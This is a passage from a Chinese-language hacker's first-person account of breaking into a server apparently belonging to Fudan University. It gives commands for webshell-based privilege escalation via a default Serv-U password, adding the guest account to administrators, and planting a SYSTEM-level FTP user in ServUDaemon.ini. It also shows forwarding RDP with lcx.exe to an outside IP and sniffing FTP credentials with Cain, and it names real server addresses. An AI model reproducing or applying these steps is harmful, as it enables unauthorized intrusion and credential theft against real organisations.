在圖12里面，我們可以看到有ASPNET這個(gè)用戶，一般來說很有可能支持ASPX，因?yàn)锳SPX馬的權(quán)限一般要比ASP的高。所以我上傳了一個(gè)ASPX馬。然后再傳了一個(gè)SU提權(quán)的ASP馬，執(zhí)行："net user guest /active:yes" "net user guest password" "net localgroup administrators guest /add"三條命令，意思是先激活guest用戶，再給guest用戶設(shè)定一個(gè)密碼，再把guest用戶添加進(jìn)管理員組。幸運(yùn)的是Serv-U的默認(rèn)連接密碼沒有改，命令都成功執(zhí)行了。在ASPX馬里執(zhí)行："net user guest"我們可以發(fā)現(xiàn)guest已經(jīng)隸屬于管理員組了，

。用ASPX馬讀取了注冊(cè)表的遠(yuǎn)程桌面服務(wù)端口，發(fā)現(xiàn)就是默認(rèn)的3389，不過Terminal Services服務(wù)當(dāng)時(shí)是沒有開的。后來wyzhack放了鴿子才給開了，嘿嘿。
四、守株待兔
直接連接3389是行不通的，防火墻把我們擋在了外面。不過我們可以用lcx.exe給它來個(gè)端口轉(zhuǎn)發(fā)。直接用ASPX馬或者SU提權(quán)馬發(fā)現(xiàn)都不能執(zhí)行l(wèi)cx.exe進(jìn)行轉(zhuǎn)發(fā)，所以我想通過修改Serv-U的配置文件來添加一個(gè)具體system權(quán)限的FTP用戶，再登錄上去進(jìn)行端口轉(zhuǎn)發(fā)。就是修改C:\Program Files\Serv-U\ServUDaemon.ini這個(gè)文件的內(nèi)容啦。如何修改我就不廢話了，有興趣的話大家可以去了解下SU配置文件的存放規(guī)則，了解之后修改起來就得心應(yīng)手的了。我就添加了一個(gè)用戶名為hackest的，擁有system權(quán)限的FTP用戶。要是配置文件沒有權(quán)限修改的話，可以用SU提權(quán)馬執(zhí)行cacls.exe修改文件屬性為everyone完全控制就可以修改的了，不過cacls.exe需要文件格式為NTFS的才可以使用哦。在CMD下登錄FTP上去，執(zhí)行：
C:\Documents and Settings\All Users\Documents\lcx.exe -slave 219.129.213.252 51 127.0.0.1 3389
本機(jī)執(zhí)行：
lcx.exe -listen 51 2007
然后連接本機(jī)的的2007端口就可以登錄遠(yuǎn)程服務(wù)器了，

。到這里我們就已經(jīng)成功控制了61.129.42.42這臺(tái)服務(wù)器。接下來就是安裝cain進(jìn)行嗅探了，具體請(qǐng)參照我的另一篇關(guān)于嗅探入侵的文章。在61.129.42.42上執(zhí)行"ipconfig /all"命令得知默認(rèn)網(wǎng)關(guān)為61.129.42.1，

。復(fù)旦主站的IP為：61.129.42.5。設(shè)置好cain就可以開始嗅探攻擊了，嘿嘿。由于一開始的那幾天是五一假期時(shí)間，嗅了兩天一無所獲。N天之后終于有進(jìn)展了，wyzhack告訴我已經(jīng)成功嗅探到復(fù)旦主站的FTP用戶名和密碼了，